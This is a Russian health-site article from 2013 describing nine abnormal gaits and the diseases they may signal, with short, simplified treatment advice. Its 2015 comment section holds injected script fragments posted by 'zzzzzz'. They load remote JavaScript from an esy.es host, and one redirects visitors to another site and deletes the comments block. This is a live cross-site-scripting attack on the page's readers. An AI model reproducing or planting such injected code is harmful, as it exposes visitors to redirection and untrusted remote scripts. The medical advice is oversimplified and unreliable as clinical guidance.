Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вот кто-то с горочки спус...  >>  Вот кто-то с горочки спустился. Что походка говорит о вас
 
Обратная связь
 

Вот кто-то с горочки спустился. Что походка говорит о вас

Размер шрифта
31 июля 2013 00:00
  • google_analytics: false
  • Нравится

Можно ли по походке поставить диагноз? Можно!

Походка №1: Перемежающаяся хромота

Это нарушенный кровоток в ногах. Вследствие этого процесса больные испытывают острую боль в области икроножных мышц при ходьбе, что и приводит к хромоте. Причиной являются тромбы, перекрывающие сосуд.

Что делать?

Необходимо бросить курить, похудеть, лечить сахарный диабет, держать холестерин в норме. Непосредственное лечение включает в себе методики эндоваскулярной (внутрисосудистой) хирургии (балонная ангиопластика, стентирование, шунтирование)

Походка №2: Полусогнутая нога, касающаяся пола только носком

Это ишиас – защемление или воспаление седалищного нерва. Причиной защемления может быть: грыжа межпозвоночного диска, спондилолистез (соскальзывание одного позвонка относительно другого), спазм грушевидной мышцы (рядом с которой проходит седалищный нерв) и др. Все это приводит к боли. Нога на пораженное стороне все время полусогнута и касается пола только носком; человек старается не переносить на нее тяжесть тела. Туловище при этом отклонено в противоположную сторону и вперед. В период улучшения походка меняется: больная нога вытянута и слегка отведена в сторону. При ходьбе человек волочит ее.

Что делать?

Нужно пройти неврологический осмотр, сделать МРТ пояснично-крестцового отдела позвоночника. В зависимости от причины лечение может быть консервативным (обезболивающие, гимнастика) и оперативным.

Походка №3: Утиная походка

Это коксартроз – это дегенеративно-дистрофическое заболевание суставов, причиной которого является поражение хрящевой ткани суставных поверхностей. Как следствие – возникает деформация сустава и нарушение движений. Причиной может быть травма, эндокринные заболевания, исход других заболеваний суставов. При поражении двух тазобедренных суставов появляется «утиная походка» с переваливанием таза и туловища то в одну, то в другую сторону.

Что делать?

Необходимо сделать рентген иМРТ. Лечение – эндопротезирование суставов (по сути – замена пораженного сустава на искусственный).

Походка №4: Замедленная, скованная походка

Это болезнь Паркинсона. Из-за гибели особых клеток мозга возникают двигательные нарушения, которые формируют яркую триаду:

1. Тремор (дрожание)
2. Ригидность (напряжение мышц)
3. Брадикинезия (замедленные, скованнные движения)

Такой человек может застывать, часами сохраняя неподвижность. Характерна общая скованность. Активные движения возникают после некоторого промедления, темп их замедлен. Помимо этого, на поздних стадиях возникает так называемая постуральная неустойчивость: затруднение преодоления как состояния покоя, так и состояния движения. Человеку сложно начать движение, а начав его, трудно остановиться. Возникают явления пропульсии (лат. propulsio — проталкивание вперёд): начав движение, туловище как бы опережает ноги, в результате чего нарушается положение центра тяжести. Человек теряет устойчивость и падает

Что делать?

Необходимо обратиться к неврологу и начать лечение.

Походка №5: Пьяная походка

Это заболевание мозжечка. Мозжечок – это отдел мозга, который регулирует координацию и движения. Его функция может нарушаться из-за отравления, инсульта, инфекции, рассеянного склероза или опухоли.

В связи с неустойчивостью тела, человек идёт неуверенно, широко расставляя ноги, при этом его «бросает» из стороны в сторону. Во время ходьбы туловище человека избыточно выпрямлено. Особенно отчётлива неустойчивость при поворотах.

Что делать?

Необходимо выполнить МРТ головного мозга. Это позволит точно выяснить причину поражения мозжечка и начать лечение.

Походка №6: Рука просит, нога косит

Это инсульт, нарушение кровообращения в головном мозге. Изменения походки обусловлены повышением тонуса мышц-сгибателей руки и разгибателей ноги: плечо приведено к туловищу, предплечье согнуто, кисть повернута кнутри и согнута, бедро и голень разогнуты, стопа – в положении подошвенного сгибания. Из-за удлинения ноги больной вынужден при ходьбе заносить ее через сторону, описывая полукруг («рука просит, нога косит»).

Что делать?

Срочно обратится к неврологу!

Походка №7: Петушиная походка

Это повреждение малоберцового нерва. При этом нога просто свисает в состояние покоя, а при ходьбе, чтобы не задевать пола носком свисающей стопы, человек высоко поднимает ногу и сначала ступает носком, затем наружным краем стопы и, наконец, подошвой. Такая походка может быть проявлением грыжи межпозвоночного диска, мышечной дистрофии или следствием травмы.

Что делать?

Необходимо сделать МРТ позвоночного отдела и рентген голени, чтобы определить причину и начать лечиться!

Походка №8: Ноги в форме буквы X

По-научному это называется "вальгусная деформация коленного сустава".

В норме она встречается у детей 2-5 лет, но с возрастом проходит. При наличии у ребенка рахита или ожирения возможно развитие устойчивой деформации.

У взрослых вальгусная деформация является проявлением дегенеративных (гонартроз) или воспалительных (ревматоидный артрит) заболеваний коленного сустава

Что делать?

Обратитесь к ортопеду, сделайте рентген коленного сустава. Устойчивая вальгусная деформация обычно требует хирургического лечения различного объема (от коррегирующей остеотомии до эндопротезирования сустава)

Походка №9: Наступают только на пятку

Это туннельный тарзальный синдром – сдавление большеберцового нерва.

Причиной может быть опухоль, застой венозной крови из-за варикоза, костный нарост и травмы стопы. При этом человек щадит пораженную ногу и старается наступать только на пятку. Кроме того может быть нарушена чувствительность в области пальцев и подошвы и жгучая боль.

Что делать?

Обратитесь к неврологу. В некоторых ситуациях физиотерапия и применение противовоспалительных препаратов могут привести к выздоровлению, но иногда причину туннельного синдрома приходится устранять хирургически (если речь идет об опухоли, экзостозах, рубцовом тендовагините и т.п.).

Также вы можете ознакомиться с сюжетом передачи «Жить здорово» – «Вот кто-то с горочки спустился. Диагноз по походке».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Летящей походкой… А вы то правильно ходите?   Вот кто-то с горочки спустился   Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
О чем говорит ваша походка
Странные сигналы вашего организма
Вы ходите неправильно!

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.